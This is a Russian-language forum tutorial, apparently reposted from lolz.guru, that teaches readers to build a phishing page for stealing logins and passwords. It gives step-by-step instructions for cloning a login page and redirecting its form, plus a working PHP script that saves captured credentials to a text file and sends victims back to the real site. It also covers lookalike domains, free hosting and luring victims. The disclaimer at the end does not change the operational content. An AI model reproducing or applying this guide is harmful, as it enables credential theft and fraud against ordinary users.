Фишинг сайтов. Легко и быстро создаём фейк
Весь материал взят с lolz.guru, автор https://lolz.guru/members/3291966/
Оригинальная статья https://lolz.guru/threads/1872037/
Горячо приветствую всех читающих!
В этой статье я научу как создать фишинговую страницу с нуля, даже если ты вообще в этом не шаришь.
Всем хоть раз в голову приходила мысль на подобие “как взломать ВК/почту/да что угодно?”. Надо всегда думать шире. Этот мануал можно будет использовать не только на одном конкретном сайте или сервере.
Фишинг (англ. phishing от fishing «рыбная ловля, выуживание») — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям.
Проще говоря, займемся кражей паролей пользователя. Начнём...
Для начала нам нужно скопировать страницу и выглядеть она должна идентично настоящей.
Чтобы пользователь, зашедший туда, увидел привычную и знакомую форму входа и без лишних размышлений о адресе страницы ввёл свой логин и пароль.
- Создаём для фейка отдельную папку. Туда и будем скидывать все нужные для него файлы
- Открываем нужный нам сайт в браузере и заходим на страницу авторизации
- Сохраняем эту страницу: файл - сохранить как... В появившемся окне выбираем тип сохраняемого файла: HTML-файл с изображениями, имя: index (лучше сохранить полную версию страницы).
- С помощью блокнота открываем исходный код сохраненной страницы index.htm
Много странных закорючек - это исходный код страницы
Как говориться “глаза бояться, а руки делают”, поэтому начинаем фокусничать
Когда вы сохраняли страницу, рядом с полем для ввода логина и пароля наверняка были подписи (логично предположить что там было написано "логин", "пароль"). Вот по ним и будем ориентироваться. Ищем среди всего этого безобразия такие слова. Рядом с ними на странице у нас располагались поля ввода логина и пасса. В html коде они будут выглядеть примерно вот так:
<input type="text" name="login" value="" ...... <input type="password" name="password" ......
Имена полей (выделены жирным, в коде идут после "name=") не всегда будут именно login и password. Где-то это могут быть e-mail и pass , а где-то и username, parol.(оформление и названия зависит от кодера и сайта)
P.S. Блок с надписями "логин", "пароль" и формами ввода почти всегда находится в тэге <form>.
<form name="login" [U]action="users/passcheck.php"[/U] method="post" onsubmit="return check();">
- Меняем строку и прописываем параметру action значение login.php (если параметра action там нет - введите его сами: action="login.php")
- Ищем параметр method (в той же строчке что form и action) и ставим ему значение “post” или “get”
- Сохраняемся и закрываем
Наш скрипт будет выполнять самую важную функцию – перехват и запись введенных логина и пароля.
<?PHP
$Log = $_POST['login'];
$Pass = $_POST['password'];
$log = fopen("database.txt","at");
fwrite($log,"\n $Log:$Pass \n");
fclose($log);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://lleo.aha.ru/na/'></head></html>";
?>- В первых двух строках переменным Log и Pass присваиваются значения соответствующих полей из предыдущего файла. Именно для этого мы записывали названия полей с сохранённой страницы: мы должны указать их скрипту. Меняем login и password из квадратных скобок на то, как были названы поля ввода на нашей сохранённой странице (Кавычки не трогаем!).
- В третьей строке происходит открытие файла database.txt для записи. Можете назвать этот файл как хотите, хоть IIACCbI_JIOXOB.txt)) Главное - не забудьте как назвали (название должно быть написано английскими буквами) и создайте текстовый документ с таким именем в папке с фейком.
- Четвёртая строка - запись в файл строки вида \n $Log:$Pass \n, где \n - переход на новую строку, $Log:$Pass - значения переменных с логином и паролем, записанные через двоеточие.
- Строка пятая - сохранение, закрытие файла.
- Последняя строка - редирект (переадресация) на другую страницу (пока юзверь не просёк что это фейк). В этой строчке после URL= вписываем адрес страницы, куда попадёт пользователь сразу после того как введёт логин и пароль (и снова будте аккуратны с кавычкой после адреса - она должна там быть!). Лучше всего отправить его на настоящую страницу (ну откуда там вы страничку копировали?) с сообщением о вводе неверного пароля. Тогда бедолага решит что что-то не так ввёл, попорбует снова и зайдёт, ничего не заподозрив!
- Сохраняем файл с именем login.php в папку с фейком
Нам понадобится бесплатный хостинг с поддержкой php
Например:
Freehostia
HostiMan.ru
Free.beget.ru
Free.sprinthost.ru
HyperHost.ua
Hostronavt.ru
Hostkoss.com
- Регистрируем домен на этом хосте с названием, максимально похожим на адрес страницы, которую мы подделываем (например Vk.login.com), чтобы нашей цели не бросалось в глаза
- Качаем Filezilla или любой другой файловый менеджер
Слева видим все папки и файлы нашего компьютера, справа – наш сервер. Осталось его только дополнить
- Перекидываем все сохраненные файлы нашей фишинговой страницы на новоиспеченный сайт.
- Создаем на сайте текстовый файл “database.txt” (В нем и будут сохраняться все введенные логины и пароли в виде: “log : pass”)
Вместо localhost будем открывать тот адрес, который мы зарегистрировали. Соответственно, файл с сохранёнными паролями будет находиться там же (http://наш_адрес/database.txt).
Теперь наш фишинговый сайт можно использовать в разных целях, но остался один главный шаг.
Самый сложный и творческий этап. Придется импровизировать как заманить жертву на фейк.
Все зависит от тематики и интересов жертвы.
Писать на почту, в другие месенджеры, хоть голубем эту ссылку отправляйте. Это полностью ваша фантазия
- Мы создали фейковую страницу какого-то сайта, где теперь можем заимствовать пароли (или даже банковские карты).
- По этой схеме можно создавать фейки за 10 минут
- Теперь знаем как отличить фейковый сайт от настоящего и будем смотреть на адрес сайта.
- Сами не переходим по неизвестным и подозрительным ссылкам.
Это статья создана для того чтобы понять как создаются фишинговые сайты и автор не несет никакой ответственности за содеянное.